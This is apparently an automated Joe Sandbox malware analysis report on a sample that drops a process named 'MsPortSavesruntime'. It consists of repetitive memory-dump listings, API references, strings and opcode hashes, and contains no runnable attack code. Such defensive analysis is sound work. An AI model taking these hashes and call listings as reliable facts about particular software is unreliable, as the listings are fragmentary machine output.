                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                    • Opcode ID: 3f5523c71cefae6a279a55e4ee87eb525791082f451270d2cd4be4376dc4aee0
                                                                                                                    • Instruction ID: 921609d4bd0be6768452886e35a761a2bef8b287fdfcbab1cc3074f10c31a9ed
                                                                                                                    • Opcode Fuzzy Hash: 3f5523c71cefae6a279a55e4ee87eb525791082f451270d2cd4be4376dc4aee0
                                                                                                                    • Instruction Fuzzy Hash: ED415FB1904558A9EB25EB64CC59EEFB3BDAF41300F4040F6B609A2093DB745F89CB65
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: }
                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                    • Opcode ID: bbef74b8cb5b5e4b0d89209ea621724632b2210e3a3a43bafeb5ff2b730b9a8c
                                                                                                                    • Instruction ID: fd91dc088ac9759a7cc4a5b56d14f8c71fe31e1891583cbd929759ac06004f3d
                                                                                                                    • Opcode Fuzzy Hash: bbef74b8cb5b5e4b0d89209ea621724632b2210e3a3a43bafeb5ff2b730b9a8c
                                                                                                                    • Instruction Fuzzy Hash: E621F37290470A5AD735EA64D845FABB3DCDF81752F00042AF980C3142FB65EE4C87B2
                                                                                                                    APIs
                                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010458,0005B270,?,?), ref: 0005DE18
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogParam
                                                                                                                    • String ID: GETPASSWORD1$xz
                                                                                                                    • API String ID: 665744214-1780906847
                                                                                                                    • Opcode ID: 0cd816ab68eeb4b0b27fa0188b922c325908a18dbde6af524a5275f958dbb5b2
                                                                                                                    • Instruction ID: 744203060ddea2df943f57f5276b2a1e2887a0e5031426c353ec063c99beba0f
                                                                                                                    • Opcode Fuzzy Hash: 0cd816ab68eeb4b0b27fa0188b922c325908a18dbde6af524a5275f958dbb5b2
                                                                                                                    • Instruction Fuzzy Hash: D1110F726001446AEF21AE34DC02FEF37D8B705352F144026BD49AB181C7B8AD88D774
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0004F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0004F2E4
                                                                                                                      • Part of subcall function 0004F2C5: GetProcAddress.KERNEL32(000881C8,CryptUnprotectMemory), ref: 0004F2F4
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0004F33E), ref: 0004F3D2
                                                                                                                    Strings
                                                                                                                    • CryptUnprotectMemory failed, xrefs: 0004F3CA
                                                                                                                    • CryptProtectMemory failed, xrefs: 0004F389
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                    • Opcode ID: 69f152cde07b76a5c2cecf2b831e16d7451addbb0cde5bf6c3c117fa56e3e825
                                                                                                                    • Instruction ID: c65a4a71582d254e0243fb70f341ab5b444c82bdd0d6efbcd05b1a0df6365ce1
                                                                                                                    • Opcode Fuzzy Hash: 69f152cde07b76a5c2cecf2b831e16d7451addbb0cde5bf6c3c117fa56e3e825
                                                                                                                    • Instruction Fuzzy Hash: C311D6B1E002266BEF15AF20DC4567E3798FF00751B048135FC456B252DE789E419799
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0004B9B8
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                                    • String ID: %c:\
                                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                                    • Opcode ID: 21dbc0a38ae396139c268bed8430817dce9d23157fb2f93b32a7888896942722
                                                                                                                    • Instruction ID: 7dc06a1ac12a6781cfb8dee30962cf27458fc3e1b2d314c1e9451c310abda69e
                                                                                                                    • Opcode Fuzzy Hash: 21dbc0a38ae396139c268bed8430817dce9d23157fb2f93b32a7888896942722
                                                                                                                    • Instruction Fuzzy Hash: 0701B5A360431279DA70AB798C86DBBB7ECEF95770B50452AF544D6083EB30D85482F6
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00010000,00051160,?,00000000,00000000), ref: 00051043
                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0005108A
                                                                                                                      • Part of subcall function 00046C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00046C54
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                    • String ID: CreateThread failed
                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                    • Opcode ID: 3e838e0e66e703eeb0003f57e95d9fff5170f38daea1f569095d61b0b536459a
                                                                                                                    • Instruction ID: 78de940162f474eca6e65965328c25bb7d472ec9b43fea5cfb4ec06361b42ddf
                                                                                                                    • Opcode Fuzzy Hash: 3e838e0e66e703eeb0003f57e95d9fff5170f38daea1f569095d61b0b536459a
                                                                                                                    • Instruction Fuzzy Hash: 77012BB53003096BE3306E24DC51BF7739CFB40751F10002DFE86562C2CAE568C98724
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0004E2E8: _swprintf.LIBCMT ref: 0004E30E
                                                                                                                      • Part of subcall function 0004E2E8: _strlen.LIBCMT ref: 0004E32F
                                                                                                                      • Part of subcall function 0004E2E8: SetDlgItemTextW.USER32(?,0007E274,?), ref: 0004E38F
                                                                                                                      • Part of subcall function 0004E2E8: GetWindowRect.USER32(?,?), ref: 0004E3C9
                                                                                                                      • Part of subcall function 0004E2E8: GetClientRect.USER32(?,?), ref: 0004E3D5
                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                    • SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                    • Opcode ID: 35c84e86f2151c6aa9c38dde640f16ff232604fea626c39aeabb376aede61b24
                                                                                                                    • Instruction ID: bcc0e361166945f21d85a5e0b784eac03474afa575e4cbdf9fdedb2729dce501
                                                                                                                    • Opcode Fuzzy Hash: 35c84e86f2151c6aa9c38dde640f16ff232604fea626c39aeabb376aede61b24
                                                                                                                    • Instruction Fuzzy Hash: D6F04FB0144288AAEF552F60CC0EBEA3BD9AF45346F048224FD84555A1CBB8CAD1EB58
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0006BF30: GetEnvironmentStringsW.KERNEL32 ref: 0006BF39
                                                                                                                      • Part of subcall function 0006BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006BF5C
                                                                                                                      • Part of subcall function 0006BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006BF82
                                                                                                                      • Part of subcall function 0006BF30: _free.LIBCMT ref: 0006BF95
                                                                                                                      • Part of subcall function 0006BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006BFA4
                                                                                                                    • _free.LIBCMT ref: 000682AE
                                                                                                                    • _free.LIBCMT ref: 000682B5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID: 0"
                                                                                                                    • API String ID: 400815659-2622329788
                                                                                                                    • Opcode ID: 153621c15f097b260d79b982e156f0c56472aff40a0a859766483b603a85ec95
                                                                                                                    • Instruction ID: abdb56c5fa96c49a48af2688e917361432b2cbf20c98fd64a843808df65938a0
                                                                                                                    • Opcode Fuzzy Hash: 153621c15f097b260d79b982e156f0c56472aff40a0a859766483b603a85ec95
                                                                                                                    • Instruction Fuzzy Hash: CEE02273A06D4351A7B172BE6C227EF17874FC2338B548326F920DB0C3CE58880247A2
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00051206,?), ref: 00050FEA
                                                                                                                    • GetLastError.KERNEL32(?), ref: 00050FF6
                                                                                                                      • Part of subcall function 00046C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00046C54
                                                                                                                    Strings
                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00050FFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                    • Opcode ID: 309e7805b664bc2716e07ec492733c7c1db2fa3e8ba0284a733e6abea39b9a10
                                                                                                                    • Instruction ID: 8601a3c3c3ae8088fadd01d3cda07b805933f63e024de3814cabf985823c9a5e
                                                                                                                    • Opcode Fuzzy Hash: 309e7805b664bc2716e07ec492733c7c1db2fa3e8ba0284a733e6abea39b9a10
                                                                                                                    • Instruction Fuzzy Hash: B5D02B7194412036E61033249C05DFF3C04AF12331B104B14F53C642E3CB5D09C166D7
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0004DA55,?), ref: 0004E2A3
                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0004DA55,?), ref: 0004E2B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                    • String ID: RTL
                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                    • Opcode ID: b2ec71701d0530ae29bdb47782be4f9c8b0e202396828f1a42b5c67e28d0ebcd
                                                                                                                    • Instruction ID: 7abd6c5d99e2888385ecb3935162a886d795f27ec30ce66883210c2cd3ba4f9a
                                                                                                                    • Opcode Fuzzy Hash: b2ec71701d0530ae29bdb47782be4f9c8b0e202396828f1a42b5c67e28d0ebcd
                                                                                                                    • Instruction Fuzzy Hash: 2CC01231A407606AF63017646D1DB836B586B00B11F050458B249F91D1D6EDD58096E0

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:8.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:33.3%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:3
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 7927 7ffd9beb980a 7930 7ffd9bebd6e0 QueryFullProcessImageNameA 7927->7930 7929 7ffd9bebd884 7930->7929

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 026c0e6bfcfea4eb64f6f66b0822243afe626e68370a8acd196bbaf0aad86ef3
                                                                                                                    • Instruction ID: 091733e5350a3043da2a29f96a2356a6d93fabec5b77830d7eb97e1473292d61
                                                                                                                    • Opcode Fuzzy Hash: 026c0e6bfcfea4eb64f6f66b0822243afe626e68370a8acd196bbaf0aad86ef3
                                                                                                                    • Instruction Fuzzy Hash: 7991F6B1A19A8D8FE799EB6888657B87FE1FF5A314F0101BED049D72E6DEB81410C740

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: c1e76038c72430c0e27f6da6e9b16aa5da4e07271c7bc3c5b3d1998584a1855e
                                                                                                                    • Instruction ID: 9ec78bfb1d555c3c4c2e629127fbce79dfef656486633dc04b785726e2ef7695
                                                                                                                    • Opcode Fuzzy Hash: c1e76038c72430c0e27f6da6e9b16aa5da4e07271c7bc3c5b3d1998584a1855e
                                                                                                                    • Instruction Fuzzy Hash: 6F01D12772A95E8BD641AB7EF8500F8BB40EAD7136B9603F7D044C71A2E551285AC3D0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2071267160.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9beb0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullImageNameProcessQuery
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3578328331-0
                                                                                                                    • Opcode ID: 281f5cdf3b5ce6a37e68ab7a228f04ac35551a7f47d7f349600c2ce48db85b51
                                                                                                                    • Instruction ID: 03f2c6dba62ffc8723d4ee9476f61c615c015a8ac8a965d67b899fdf217b2587
                                                                                                                    • Opcode Fuzzy Hash: 281f5cdf3b5ce6a37e68ab7a228f04ac35551a7f47d7f349600c2ce48db85b51
                                                                                                                    • Instruction Fuzzy Hash: D4719230A18A4D8FEB68DF28D8557F937E1FB58311F00823EE84EC7291CB75A9418B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 97843da3fabd07c97bbb61a2b89a29525246b58c4c3f8abf3059395817c2e436
                                                                                                                    • Instruction ID: 297db14a076e3124cc16a82c31c5b4b985759a2396121facd3edcdfbbb4f8e9e
                                                                                                                    • Opcode Fuzzy Hash: 97843da3fabd07c97bbb61a2b89a29525246b58c4c3f8abf3059395817c2e436
                                                                                                                    • Instruction Fuzzy Hash: 0D414922B0D5590AD718F7AC64A56F97780DF5933AF0406BBE44ECB1EBCD18A941C284
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
